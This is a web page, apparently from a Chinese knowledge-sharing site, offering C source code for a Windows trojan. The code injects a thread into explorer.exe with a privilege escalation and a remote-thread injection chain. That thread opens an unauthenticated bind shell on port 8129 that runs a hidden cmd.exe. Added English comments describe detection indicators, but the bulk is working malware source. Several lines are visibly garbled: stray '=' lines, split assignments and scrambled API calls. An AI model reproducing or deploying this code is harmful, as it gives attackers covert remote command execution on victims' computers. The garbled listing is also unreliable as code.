
C语言编写的木马程序(源代码附上)

2024-01-02 来源:飒榕旅游知识分享网


#include

#pragma comment(lib,\"ws2_32.lib\")

#include

#include

#pragma comment(lib,\"Shlwapi.lib\")

#include

#include

#include

//参数结构 ;

/*
 * Parameter block that WinMain fills in and copies into the target process
 * next to the copied ThreadProc code.  The injected thread cannot use its own
 * import table, so every Win32/Winsock routine it needs arrives here as a raw
 * 32-bit address that GetProcAddress returned *in the injector*; that only
 * works while both processes map kernel32/wsock32/user32 at the same base.
 * The trailing char arrays hold the strings the thread uses, because string
 * literals would stay in the injector's image rather than in the copied code.
 *
 * Defender note: a table of DLL entry-point addresses followed by the strings
 * "wsock32.dll" and "cmd.exe" in a foreign process's writable memory is a
 * distinctive memory-scan indicator for this injection style.
 */
typedef struct _RemotePara

{

DWORD dwLoadLibrary;      // kernel32!LoadLibraryA — used to pull wsock32.dll into the host process

DWORD dwFreeLibrary;      // kernel32!FreeLibrary — resolved, never called by ThreadProc

DWORD dwGetProcAddress;   // kernel32!GetProcAddress — resolved, never called by ThreadProc

DWORD dwGetModuleHandle;  // kernel32!GetModuleHandleA — resolved, never called by ThreadProc

DWORD dwWSAStartup;       // wsock32!WSAStartup

DWORD dwSocket;           // wsock32!socket

DWORD dwhtons;            // wsock32!htons

DWORD dwbind;             // wsock32!bind

DWORD dwlisten;           // wsock32!listen

DWORD dwaccept;           // wsock32!accept

DWORD dwsend;             // wsock32!send

DWORD dwrecv;             // wsock32!recv

DWORD dwclosesocket;      // wsock32!closesocket

DWORD dwCreateProcessA;   // kernel32!CreateProcessA — spawns the hidden cmd.exe

DWORD dwPeekNamedPipe;    // kernel32!PeekNamedPipe — polls cmd.exe output without blocking

DWORD dwWriteFile;        // kernel32!WriteFile — feeds client input to cmd.exe

DWORD dwReadFile;         // kernel32!ReadFile — drains cmd.exe output

DWORD dwCloseHandle;      // kernel32!CloseHandle

DWORD dwCreatePipe;       // kernel32!CreatePipe

DWORD dwTerminateProcess; // kernel32!TerminateProcess — resolved, never called by ThreadProc

DWORD dwMessageBox;       // user32!MessageBoxA — only referenced by a commented-out call

char strMessageBox[12];   // "Sucess!" — only used by the commented-out MessageBox call

char winsockDll[16];      // "wsock32.dll" — argument to LoadLibraryA inside the host

char cmd[10];             // "cmd.exe" — command line handed to CreateProcessA

char Buff[4096];          // transfer buffer shared by the socket<->pipe bridge loop

char telnetmsg[60];       // "Connect Sucessful!\n" — only used by a commented-out send

}RemotePara;

// 提升应用级调试权限

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);

// 根据进程名称得到进程ID

DWORD GetPidByName(char *szName);

// 远程线程执行体

/*
 * Body of the thread that WinMain copies into the target process and starts
 * with CreateRemoteThread.  Para points at the RemotePara that WinMain also
 * copied over.  Nothing here is called through an import: every routine is
 * reached via the raw addresses in Para, which is why the function declares
 * its own function-pointer typedefs and a long list of FARPROC locals.
 *
 * As written it: loads wsock32.dll into the host, binds a listening TCP
 * socket on every interface at port 8129, accepts a single client, starts a
 * hidden cmd.exe with stdin/stdout/stderr rerouted through two anonymous
 * pipes, and then shuttles bytes between that client and the pipes until
 * either side fails.  The client is never authenticated.
 *
 * Defender note: the observable result is the host process (explorer.exe
 * per WinMain) owning a LISTEN socket on 8129 and a hidden cmd.exe child
 * whose standard handles are pipes; both are cheap telemetry checks.
 * Returns 0 on every failure path and after the client disconnects.
 */
DWORD __stdcall ThreadProc(RemotePara *Para)

{

// Winsock, pipe and child-process state for the bridged shell.
WSADATA WSAData;

WORD nVersion;

SOCKET listenSocket;

SOCKET clientSocket;

struct sockaddr_in server_addr;

struct sockaddr_in client_addr;

int iAddrSize = sizeof(client_addr);

SECURITY_ATTRIBUTES sa;

HANDLE hReadPipe1;

HANDLE hWritePipe1;

HANDLE hReadPipe2;

HANDLE hWritePipe2;

STARTUPINFO si;

PROCESS_INFORMATION ProcessInformation;

unsigned long lBytesRead = 0;

// Typed prototypes for the kernel32 loader entries; everything else below
// is called through an untyped FARPROC, so no argument checking happens.
typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);

typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);

typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );

typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);

FARPROC PMessageBoxA;

FARPROC PWSAStartup;

FARPROC PSocket;

FARPROC Phtons;

FARPROC Pbind;

FARPROC Plisten;

FARPROC Paccept;

FARPROC Psend;

FARPROC Precv;

FARPROC Pclosesocket;

FARPROC PCreateProcessA;

FARPROC PPeekNamedPipe;

FARPROC PWriteFile;

FARPROC PReadFile;

FARPROC PCloseHandle;

FARPROC PCreatePipe;

FARPROC PTerminateProcess;

// Loader entries pre-resolved by the injector.  Only LoadLibraryFunc is
// actually called; the other three are assigned and then unused.
PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;

PGetProcAddress GetProcAddressFunc (PGetProcAddress)Para->dwGetProcAddress;

PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;

PGetModuleHandle GetModuleHandleFunc (PGetModuleHandle)Para->dwGetModuleHandle;

// Pull wsock32.dll into the host process (Para->winsockDll is "wsock32.dll").
LoadLibraryFunc(Para->winsockDll);

// Winsock, pipe, process and MessageBox entry points, all handed over as raw
// addresses in Para.  (The two bare "=" lines below are transcription
// residue on this page and are kept as printed.)
PWSAStartup = (FARPROC)Para->dwWSAStartup;

PSocket = (FARPROC)Para->dwSocket;

Phtons = (FARPROC)Para->dwhtons;

Pbind = (FARPROC)Para->dwbind;

=

=

Plisten = (FARPROC)Para->dwlisten;

Paccept = (FARPROC)Para->dwaccept;

Psend = (FARPROC)Para->dwsend;

Precv = (FARPROC)Para->dwrecv;

Pclosesocket = (FARPROC)Para->dwclosesocket;

PCreateProcessA = (FARPROC)Para->dwCreateProcessA;

PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe;

PWriteFile = (FARPROC)Para->dwWriteFile;

PReadFile = (FARPROC)Para->dwReadFile;

PCloseHandle = (FARPROC)Para->dwCloseHandle;

PCreatePipe = (FARPROC)Para->dwCreatePipe;

PTerminateProcess = (FARPROC)Para->dwTerminateProcess;

PMessageBoxA = (FARPROC)Para->dwMessageBox;

// Winsock 2.1 initialisation; the WSAStartup result is not checked.
nVersion = MAKEWORD(2,1);

PWSAStartup(nVersion, (LPWSADATA)&WSAData);

// Listening socket on INADDR_ANY:8129 — every interface, no client filtering.
listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);

if(listenSocket == INVALID_SOCKET)return 0;

server_addr.sin_family = AF_INET;

server_addr.sin_port = Phtons((unsigned short)(8129));

server_addr.sin_addr.s_addr = INADDR_ANY;

if(Pbind(listenSocket, (struct sockaddr *)&server_addr,

sizeof(SOCKADDR_IN)) != 0)return 0;

if(Plisten(listenSocket, 5))return 0;

// Blocks until the first client connects; only that one client is served.
clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);

// Greeting banner to the client, disabled upstream.
// Psend(clientSocket, Para->telnetmsg, 60, 0);

// Two anonymous pipes: pipe1 carries cmd.exe's output, pipe2 carries its input.
if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;

if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;

// Hidden cmd.exe whose stdio is redirected through the pipes (bInheritHandles = 1).
ZeroMemory(&si,sizeof(si)); // ZeroMemory is a C run-time library function and can be called directly (translated from the original comment)

si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

si.wShowWindow = SW_HIDE;

si.hStdInput = hReadPipe2;

si.hStdOutput = si.hStdError = hWritePipe1;

if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;

// Bridge loop: if cmd.exe has output pending, forward it to the socket;
// otherwise block in recv() and push whatever the client sent into cmd.exe's
// stdin.  Ends on any pipe/socket failure or when recv() reports <= 0.
while(1) {

memset(Para->Buff,0,4096);

PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);

if(lBytesRead) {

if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;

if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break;

}else {

lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);

if(lBytesRead <=0 ) break;

if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break;

}

}

// Teardown: pipes and both sockets.  The cmd.exe child is left running and
// its process/thread handles in ProcessInformation are not closed.
PCloseHandle(hWritePipe2);

PCloseHandle(hReadPipe1);

PCloseHandle(hReadPipe2);

PCloseHandle(hWritePipe1);

Pclosesocket(listenSocket);

Pclosesocket(clientSocket);

// Completion dialog, disabled upstream (its last argument survives on the next line as printed).
// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox,

MB_OK);

return 0;

}

/*
 * Injector, running in the dropper process.  Enables SeDebugPrivilege on its
 * own token, finds the PID of EXPLORER.EXE, opens it with PROCESS_ALL_ACCESS,
 * allocates an executable page there, copies THREADSIZE bytes of ThreadProc
 * into it, builds a RemotePara of resolved API addresses and strings, copies
 * that into a second allocation, and starts ThreadProc in the target via
 * CreateRemoteThread.  It then spins in while(1){} forever, so the
 * FreeLibrary/CloseHandle calls after the loop are never reached.
 *
 * Defender note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) ->
 * WriteProcessMemory -> CreateRemoteThread against explorer.exe from an
 * ordinary user process is the textbook remote-thread injection chain
 * (MITRE ATT&CK T1055); it is precisely the API sequence that user-mode EDR
 * hooks and the Windows threat-intelligence ETW provider are built to
 * surface, and the busy-wait leaves the dropper pinned at full CPU.
 *
 * NOTE(review): several call sites in this listing are scrambled by the
 * page's extraction (the WriteProcessMemory call, the LoadLibraryA/
 * FreeLibrary/CreateProcessA resolutions, the CreateRemoteThread call whose
 * tail appears after the function); they are kept exactly as printed.
 */
int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,

LPSTR lpCmdLine,

int nCmdShow)

{

// Size of the code copy made below; the sample assumes ThreadProc fits in it.
const DWORD THREADSIZE=1024*4;

DWORD byte_write;

void *pRemoteThread;

HANDLE hToken,hRemoteProcess,hThread;

HINSTANCE hKernel,hUser32,hSock;

RemotePara myRemotePara,*pRemotePara;

DWORD pID;

// SeDebugPrivilege on our own token so OpenProcess on explorer.exe can
// succeed with full access; neither call's result is checked.
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);

EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);

// Get a handle to the target process with PROCESS_ALL_ACCESS (translated from the original comment)

// Target selection: the first process whose name starts with EXPLORER.EXE.
pID = GetPidByName(\"EXPLORER.EXE\");

if(pID == 0)return 0;

hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);

if(!hRemoteProcess)return 0;

// Allocate virtual memory in the remote process's address space (translated from the original comment)

// RWX page in the target to receive the code copy.
pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE,

MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);

if(!pRemoteThread)return 0;

// Write the thread body ThreadProc into the remote process (translated from the original comment)

// Copy of ThreadProc's bytes into that page (argument order is scrambled in
// this transcription; the next line is the displaced middle of the call).
if(!WriteProcessMemory(hRemoteProcess, THREADSIZE,0))return 0;

pRemoteThread, &ThreadProc,

// Build the parameter block: each API address is resolved here, in the
// injector, and handed to the remote thread as a raw DWORD.  Several of
// the assignments below are split across lines by the page's extraction.
ZeroMemory(&myRemotePara,sizeof(RemotePara));

hKernel = LoadLibrary( \"kernel32.dll\");

myRemotePara.dwLoadLibrary \"LoadLibraryA\");

= (DWORD)GetProcAddress(hKernel,

myRemotePara.dwFreeLibrary \"FreeLibrary\");

= (DWORD)GetProcAddress(hKernel,

myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, \"GetProcAddress\");

myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, \"GetModuleHandleA\");

myRemotePara.dwCreateProcessA \"CreateProcessA\");

= (DWORD)GetProcAddress(hKernel,

myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, \"PeekNamedPipe\");

myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel,

\"WriteFile\");

myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, \"ReadFile\");

myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, \"CloseHandle\");

myRemotePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, \"CreatePipe\");

myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, \"TerminateProcess\");

// Winsock entries come from wsock32.dll, the same DLL ThreadProc loads in the host.
hSock = LoadLibrary(\"wsock32.dll\");

myRemotePara.dwWSAStartup

(DWORD)GetProcAddress(hSock,\"WSAStartup\");

=

myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock,\"socket\");

myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock,\"htons\");

myRemotePara.dwbind = (DWORD)GetProcAddress(hSock,\"bind\");

myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock,\"listen\");

myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock,\"accept\");

myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock,\"recv\");

myRemotePara.dwsend = (DWORD)GetProcAddress(hSock,\"send\");

myRemotePara.dwclosesocket

(DWORD)GetProcAddress(hSock,\"closesocket\");

=

hUser32 = LoadLibrary(\"user32.dll\");

myRemotePara.dwMessageBox \"MessageBoxA\");

= (DWORD)GetProcAddress(hUser32,

// Strings carried into the target; the struct was zeroed above, so each
// strcat starts from an empty array.
strcat(myRemotePara.strMessageBox,\"Sucess!\\\\0\");

strcat(myRemotePara.winsockDll,\"wsock32.dll\\\\0\");

strcat(myRemotePara.cmd,\"cmd.exe\\\\0\");

strcat(myRemotePara.telnetmsg,\"Connect Sucessful!\\\\n\\\\0\");

// Write into the target process (translated from the original comment)

// Second remote allocation (read/write only) for the parameter block, then copy it over.
pRemotePara =(RemotePara *)VirtualAllocEx

(hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);

if(!pRemotePara)return 0;

if(!WriteProcessMemory

(hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;

// Start the thread (translated from the original comment)

// Run the copied ThreadProc in the target with pRemotePara as its argument
// (the call is scrambled on this page; its displaced tail is printed after
// the closing brace of WinMain).  hThread is never checked or closed.
hThread = CreateRemoteThread(hRemoteProcess *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);

// Busy-wait forever so the dropper stays alive; nothing below is ever reached.
while(1) {}

FreeLibrary(hKernel);

FreeLibrary(hSock);

FreeLibrary(hUser32);

CloseHandle(hRemoteProcess);

CloseHandle(hToken);

return 0;

}

,0,0,(DWORD (__stdcall

/*
 * Enables (fEnable != 0) or disables the named privilege szPrivName on hToken.
 * WinMain uses it to turn on SE_DEBUG_NAME before opening explorer.exe.
 *
 * Success is judged by GetLastError() == ERROR_SUCCESS rather than by the
 * AdjustTokenPrivileges return value, following the usual Win32 sample
 * pattern (AdjustTokenPrivileges can return TRUE with ERROR_NOT_ALL_ASSIGNED
 * when the privilege is not held).  The LookupPrivilegeValue result is not
 * checked.
 *
 * Defender note: SeDebugPrivilege being enabled on a non-debugger user
 * process (token right adjustment auditing, Security event 4703) is an
 * early signal for the cross-process access that follows.
 */
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){

TOKEN_PRIVILEGES tp;

tp.PrivilegeCount = 1;

LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);

tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;

AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);

return((GetLastError() == ERROR_SUCCESS));

}

/*
 * Returns the PID of the first running process whose image name starts with
 * szName (case-insensitive prefix comparison over strlen(szName) characters
 * via StrCmpNI), or 0 when no such process exists or the Toolhelp32
 * snapshot cannot be taken.
 *
 * Because it is a prefix match, a longer image name sharing the prefix would
 * also be accepted.  The snapshot handle is closed on the found/not-found
 * paths, but the "else return 0" branch taken when Process32First fails
 * returns without closing it.
 */
DWORD GetPidByName(char *szName)

{

HANDLE hProcessSnap = INVALID_HANDLE_VALUE;

PROCESSENTRY32 pe32={0};

DWORD dwRet=0;

// Snapshot of all processes on the system.
hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;

// dwSize must be set before Process32First or the call fails.
pe32.dwSize = sizeof(PROCESSENTRY32);

if(Process32First(hProcessSnap, &pe32))

{

do

{

// Case-insensitive compare of only the first strlen(szName) characters.
if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0)

{

dwRet=pe32.th32ProcessID;

break;

}

}while (Process32Next(hProcessSnap,&pe32));

}

else return 0;

if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);

return dwRet;

}
